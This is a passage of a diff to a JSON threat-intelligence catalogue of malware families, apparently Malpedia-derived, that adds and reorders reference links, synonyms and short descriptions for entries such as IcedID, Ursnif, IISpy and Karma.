postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid", "https://www.microsoft.com/security/blog/2020/12/09/edr-in-block-mode-stops-icedid-cold/", - "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware", - "https://www.youtube.com/watch?v=wObF9n2UIAM", - "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7", - "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", - "https://www.f5.com/labs/articles/threat-intelligence/icedid-banking-trojan-uses-covid-19-pandemic-to-lure-new-victims", - "https://tccontre.blogspot.com/2020/08/learning-from-iceid-loader-including.html", - "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", - "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html", - "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", - "https://securityintelligence.com/icedid-banking-trojan-spruces-up-injection-tactics-to-add-stealth/", - "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/", - "https://tccontre.blogspot.com/2021/01/", - "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://zero2auto.com/2020/06/22/unpacking-visual-basic-packers/", - "https://www.group-ib.com/blog/icedid", - "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", + "https://team-cymru.com/blog/2021/05/19/tracking-bokbot-infrastructure/", "https://www.youtube.com/watch?v=7Dk7NkIbVqY", + "https://www.youtube.com/watch?v=wObF9n2UIAM", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://unit42.paloaltonetworks.com/ta551-shathak-icedid/", - "https://blog.talosintelligence.com/2020/07/valak-emerges.html", - "https://www.nri-secure.co.jp/blog/explaining-the-tendency-of-malware-icedid", - "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://ceriumnetworks.com/threat-of-the-month-icedid-malware/", + "https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/", + "https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/", + "https://www.youtube.com/watch?v=wMXD4Sv1Alw", + "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", + "https://www.binarydefense.com/icedid-gziploader-analysis/", + "https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html", + "https://github.com/Lastline-Inc/iocs-tools/tree/main/2021-07-IcedID-Part-2", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware", + "https://www.uptycs.com/blog/icedid-campaign-spotted-being-spiced-with-excel-4-macros", + "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7", + "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", + "https://securityintelligence.com/icedid-banking-trojan-spruces-up-injection-tactics-to-add-stealth/", + "https://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/", + "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", + "https://www.youtube.com/watch?v=oZ4bwnjcXWg", "https://blog.cyberint.com/icedid-stealer-man-in-the-browser-banking-trojan", - "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://blog.malwarebytes.com/threat-analysis/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads/", + "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-one.html", + "https://gist.github.com/psrok1/e6bf5851d674edda03a201e7f24a5e6b", + "https://www.secureworks.com/research/threat-profiles/gold-swathmore", + "https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/", + "https://tccontre.blogspot.com/2021/01/", + "https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html", + "https://www.f5.com/labs/articles/threat-intelligence/icedid-banking-trojan-uses-covid-19-pandemic-to-lure-new-victims", + "https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/", + "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/", + "https://threatresearch.ext.hp.com/detecting-ta551-domains/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://zero2auto.com/2020/06/22/unpacking-visual-basic-packers/", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://github.com/telekom-security/icedid_analysis", + "https://www.nri-secure.co.jp/blog/explaining-the-tendency-of-malware-icedid", + "https://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/", + "https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/", + "https://thedfirreport.com/2021/05/12/conti-ransomware/", + "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html", + "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", + "https://medium.com/@dawid.golak/icedid-aka-bokbot-analysis-with-ghidra-560e3eccb766", + "https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/", + "https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/", + "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", + "https://www.fortinet.com/blog/threat-research/deep-dive-icedid-malware-analysis-of-child-processes.html", + "https://4rchib4ld.github.io/blog/IcedIDOnMyNeckImTheCoolest/", + "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/", + "https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917", + "https://blog.reconinfosec.com/an-encounter-with-ta551-shathak", + "https://blogs.vmware.com/security/2021/07/hunting-icedid-and-unpacking-automation-with-qiling.html", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", + "https://tccontre.blogspot.com/2020/08/learning-from-iceid-loader-including.html", + "https://blog.minerva-labs.com/icedid-maas", + "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", + "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", + "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", + "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites", + "https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders", + "https://www.mimecast.com/globalassets/documents/whitepapers/taa551-treatresearch_final-1.15.21.pdf", + "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html", + "https://unit42.paloaltonetworks.com/ta551-shathak-icedid/", + "https://www.youtube.com/watch?v=YEqLIR6hfOM", + "https://blog.talosintelligence.com/2020/07/valak-emerges.html", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", "https://kienmanowar.wordpress.com/2020/08/16/manual-unpacking-icedid-write-up/", "https://github.com/f0wl/deICEr", - "https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/", - "https://medium.com/@dawid.golak/icedid-aka-bokbot-analysis-with-ghidra-560e3eccb766", - "https://blog.malwarebytes.com/threat-analysis/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads/", - "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", - "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html", + "https://netresec.com/?b=214d7ff", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", - "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-one.html", "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/", - "https://gist.github.com/psrok1/e6bf5851d674edda03a201e7f24a5e6b", - "https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/", - "https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html", - "https://www.secureworks.com/research/threat-profiles/gold-swathmore", - "https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/", - "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", - "https://www.fortinet.com/blog/threat-research/deep-dive-icedid-malware-analysis-of-child-processes.html", - "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://www.group-ib.com/blog/icedid", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://blogs.vmware.com/security/2021/07/icedid-analysis-and-detection.html", + "https://blog.group-ib.com/prometheus-tds", + "https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/", + "https://malwation.com/icedid-malware-technical-analysis-report/", "https://blogs.juniper.net/en-us/threat-research/iceid-campaign-strikes-back" ], "synonyms": [ @@ -18161,6 +20801,7 @@ "description": "", "meta": { "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.icyheart", "https://malpedia.caad.fkie.fraunhofer.de/details/win.icyheart" ], "synonyms": [ @@ -18189,7 +20830,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.iisniff", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/" + "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf", + "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware.pdf", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/", + "https://www.welivesecurity.com/2021/08/06/anatomy-native-iis-malware/" ], "synonyms": [], "type": [] @@ -18197,6 +20841,21 @@ "uuid": "3b746f77-214b-44f9-9ef2-0ae6b52561d6", "value": "IISniff" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.iispy", + "https://www.welivesecurity.com/2021/08/09/iispy-complex-server-side-backdoor-antiforensic-features/" + ], + "synonyms": [ + "BadIIS" + ], + "type": [] + }, + "uuid": "74afd7ae-8349-4186-9c85-82a45a2486c9", + "value": "IISpy" + }, { "description": "", "meta": { @@ -18217,11 +20876,14 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat", "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", + "https://www.politie.nl/nieuws/2021/mei/19/04-aanhouding-in-onderzoek-naar-cybercrime.html", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/", + "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html", "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/", "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", - "https://www.tripwire.com/state-of-security/featured/man-jailed-using-webcam-rat-women-bedrooms/" + "https://www.tripwire.com/state-of-security/featured/man-jailed-using-webcam-rat-women-bedrooms/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt" ], "synonyms": [], "type": [] @@ -18230,7 +20892,7 @@ "value": "Imminent Monitor RAT" }, { - "description": "", + "description": "ZScaler describes Immortal Stealer as a windows malware written in .NET designed to steal sensitive information from an infected machine. The Immortal stealer is sold on the dark web with different build-based subscriptions.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.immortal_stealer", @@ -18299,7 +20961,7 @@ "value": "Inferno" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.infodot", @@ -18309,7 +20971,7 @@ "type": [] }, "uuid": "e0ce5055-45cd-46d2-971f-bb3904ec43a1", - "value": "InfoDot Ransomware" + "value": "InfoDot" }, { "description": "", @@ -18380,6 +21042,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole", "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", "https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal/", + "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf", "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf" ], "synonyms": [], @@ -18426,25 +21089,32 @@ "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", "https://www.fortinet.com/blog/threat-research/new-variant-of-ursnif-continuously-targeting-italy", "https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html", + "https://www.zdnet.com/article/ursnif-trojan-has-targeted-over-100-italian-banks/", "https://blog.minerva-labs.com/attackers-insert-themselves-into-the-email-conversation-to-spread-malware", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", "https://lokalhost.pl/gozi_tree.txt", + "https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", + "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/", "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245", "https://www.fidelissecurity.com/threatgeek/threat-intelligence/gozi-v3-technical-update/", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html", - "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/", - "https://www.cyberbit.com/new-ursnif-malware-variant/", + "https://research.nccgroup.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/", + "https://securityintelligence.com/posts/ursnif-cerberus-android-malware-bank-transfers-italy/", "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html", + "https://www.cyberbit.com/new-ursnif-malware-variant/", "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", - "https://www.youtube.com/watch?v=KvOpNznu_3w", + "https://threatresearch.ext.hp.com/detecting-ta551-domains/", + "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/", "https://blog.yoroi.company/research/ursnif-long-live-the-steganography/", + "https://www.darktrace.com/en/blog/the-resurgence-of-the-ursnif-banking-trojan/", "https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/", "https://www.youtube.com/watch?v=jlc7Ahp8Iqg", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://news.sophos.com/en-us/2019/12/24/gozi-v3-tracked-by-their-own-stealth/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", "http://benkow.cc/DreambotSAS19.pdf", "https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html", "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/", @@ -18452,34 +21122,44 @@ "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/", "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15", "https://0ffset.net/reverse-engineering/analyzing-com-mechanisms-in-malware/", - "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", "https://isc.sans.edu/forums/diary/German+language+malspam+pushes+Ursnif/25732/", + "https://www.proofpoint.com/us/blog/security-briefs/ta544-targets-italian-organizations-ursnif-malware", "https://0ffset.net/reverse-engineering/malware-analysis/analyzing-isfb-second-loader/", "https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-ursnif-infections/", "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization", "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html", "https://www.tgsoft.it/files/report/download.asp?id=568531345", "https://blog.yoroi.company/research/the-ursnif-gangs-keep-threatening-italy/", + "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/", "https://0ffset.net/reverse-engineering/malware-analysis/analysing-isfb-loader/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", + "https://therecord.media/gozi-malware-gang-member-arrested-in-colombia/", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf", "https://www.hornetsecurity.com/en/security-information/firefox-send-sends-ursnif-malware/", "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/", "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/", "https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html", "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb", "https://www.cyberbit.com/blog/endpoint-security/new-ursnif-malware-variant/", "https://blog.yoroi.company/research/ursnif-the-latest-evolution-of-the-most-popular-banking-malware/", + "https://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/", "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex", + "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", "https://redcanary.com/resources/webinars/deep-dive-process-injection/", "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features", "https://www.tgsoft.it/files/report/download.asp?id=7481257469", "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", + "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much", "https://github.com/mlodic/ursnif_beacon_decryptor", + "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html", + "https://www.youtube.com/watch?v=KvOpNznu_3w", "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/", "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/", "https://blog.morphisec.com/ursnif/gozi-delivery-excel-macro-4.0-utilization-uptick-ocr-bypass" @@ -18499,6 +21179,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent", + "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia", "http://www.clearskysec.com/ismagent/", "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/" @@ -18570,11 +21251,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace", - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/", "https://wikileaks.org/vault7/document/2015-09-20150911-280-CSIT-15085-NfLog/2015-09-20150911-280-CSIT-15085-NfLog.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-express", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/", + "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf", "https://unit42.paloaltonetworks.com/watering-hole-attack-on-aerospace-firm-exploits-cve-2015-5122-to-install-isspace-backdoor/", - "https://www.secureworks.com/research/threat-profiles/bronze-overbrook", - "https://www.secureworks.com/research/threat-profiles/bronze-express" + "https://www.secureworks.com/research/threat-profiles/bronze-overbrook" ], "synonyms": [ "NfLog RAT" @@ -18656,6 +21338,20 @@ "uuid": "0f02ea79-5833-46e0-8458-c4a863a5a112", "value": "Jaku" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.janeleiro", + "https://www.welivesecurity.com/2021/04/06/janeleiro-time-traveler-new-old-banking-trojan-brazil/", + "https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2ebce129-d59e-401c-9259-9009d9b2d50f", + "value": "Janeleiro" + }, { "description": "Jason is a graphic tool implemented to perform Microsoft exchange account brute-force in order to “harvest” the highest possible emails and accounts information. Distributed in a ZIP container the interface is quite intuitive: the Microsoft exchange address and its version shall be provided. Three brute-force methods could be selected: EWS (Exchange Web Service), OAB (Offline Address Book) or both (All). Username and password list can be selected and threads number should be provided in order to optimize the attack balance.", "meta": { @@ -18700,7 +21396,7 @@ "value": "JCry" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jeno", @@ -18713,7 +21409,7 @@ "type": [] }, "uuid": "a1d7e117-4ca9-4d67-a4dd-53626827ed2f", - "value": "Jeno Ransomware" + "value": "Jeno" }, { "description": "Cisco Talos identified JhoneRAT in January 2020. The RAT is delivered through cloud services (Google Drive) and also submits stolen data to them (Google Drive, Twitter, ImgBB, GoogleForms). The actors using JhoneRAT target Saudi Arabia, Iraq, Egypt, Libya, Algeria, Morocco, Tunisia, Oman, Yemen, Syria, UAE, Kuwait, Bahrain and Lebanon.", @@ -18790,6 +21486,19 @@ "uuid": "8201c8d2-1dab-4473-bbdf-42952b3d5fc6", "value": "Joao" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jobcrypter", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/jobcrypter-ransomware-with-new-routines-for-encryption-desktop-screenshots" + ], + "synonyms": [], + "type": [] + }, + "uuid": "30c047ea-27c9-4b01-8532-bcaa661be85f", + "value": "win.JobCrypter" + }, { "description": "", "meta": { @@ -18835,11 +21544,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jsoutprox", - "https://blog.yoroi.company/research/unveiling-jsoutprox-a-new-enterprise-grade-implant/", "https://twitter.com/zlab_team/status/1208022180241530882", - "https://www.zscaler.com/blogs/research/targeted-attacks-indian-government-and-financial-institutions-using-jsoutprox-rat", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.fortinet.com/blog/threat-research/adversary-playbook-javascript-rat-looking-for-that-government-cheese" + "https://www.zscaler.com/blogs/research/targeted-attacks-indian-government-and-financial-institutions-using-jsoutprox-rat", + "https://blog.yoroi.company/research/unveiling-jsoutprox-a-new-enterprise-grade-implant/", + "https://www.fortinet.com/blog/threat-research/adversary-playbook-javascript-rat-looking-for-that-government-cheese", + "https://yoroi.company/research/financial-institutions-in-the-sight-of-new-jsoutprox-attack-waves/" ], "synonyms": [], "type": [] @@ -18852,7 +21562,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jssloader", - "https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/FIN7%20JSSLOADER%20FINAL%20WEB.pdf" + "https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/FIN7%20JSSLOADER%20FINAL%20WEB.pdf", + "https://www.proofpoint.com/us/blog/threat-insight/jssloader-recoded-and-reloaded", + "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/" ], "synonyms": [], "type": [] @@ -18866,7 +21578,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.juicy_potato", "https://github.com/ohpe/juicy-potato", - "https://lifars.com/wp-content/uploads/2020/06/Cryptocurrency-Miners-XMRig-Based-CoinMiner-by-Blue-Mockingbird-Group.pdf" + "https://lifars.com/wp-content/uploads/2020/06/Cryptocurrency-Miners-XMRig-Based-CoinMiner-by-Blue-Mockingbird-Group.pdf", + "https://www.welivesecurity.com/2021/08/09/iispy-complex-server-side-backdoor-antiforensic-features/" ], "synonyms": [], "type": [] @@ -18892,9 +21605,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jupyter", - "https://redcanary.com/blog/yellow-cockatoo/", + "https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer", + "https://security5magics.blogspot.com/2020/12/tracking-jupyter-malware.html", "https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction", - "https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/" + "https://blog.minerva-labs.com/new-iocs-of-jupyter-stealer", + "https://blog.talosintelligence.com/2021/07/threat-spotlight-solarmarker.html#more", + "https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/", + "https://squiblydoo.blog/2021/06/20/mars-deimos-from-jupiter-to-mars-and-back-again-part-two/", + "https://redcanary.com/blog/yellow-cockatoo/" ], "synonyms": [], "type": [] @@ -18967,10 +21685,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.karkoff", + "https://mp.weixin.qq.com/s/o_EVjBVN2sQ1q7cl4rUXoQ", + "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae", + "https://blog.telsy.com/apt34-aka-oilrig-attacks-lebanon-government-entities-with-maildropper-implant/", "https://www.secureworks.com/research/threat-profiles/cobalt-edgewater", "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html", - "https://blog.yoroi.company/research/karkoff-2020-a-new-apt34-espionage-operation-involves-lebanon-government/", - "https://blog.telsy.com/apt34-aka-oilrig-attacks-lebanon-government-entities-with-maildropper-implant/" + "https://blog.yoroi.company/research/karkoff-2020-a-new-apt34-espionage-operation-involves-lebanon-government/" ], "synonyms": [ "CACTUSPIPE", @@ -18981,6 +21701,19 @@ "uuid": "a45c16d9-6945-428c-af46-0436903f9329", "value": "Karkoff" }, + { + "description": "Ransomware.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.karma", + "https://blog.cyble.com/2021/08/24/a-deep-dive-analysis-of-karma-ransomware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2667c9a6-4811-4535-95a1-3b75ba853a03", + "value": "karma" + }, { "description": "", "meta": { @@ -19005,6 +21738,8 @@ "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/", + "https://securelist.com/apt-trends-report-q1-2021/101967/", + "https://youtu.be/SW8kVkwDOrc?t=24706", "https://securelist.com/sunburst-backdoor-kazuar/99981/" ], "synonyms": [], @@ -19027,7 +21762,7 @@ "value": "Kegotip" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kekw", @@ -19039,7 +21774,7 @@ "type": [] }, "uuid": "b178de96-14a3-49f1-a957-c83f86e23e83", - "value": "KEKW Ransomware" + "value": "KEKW" }, { 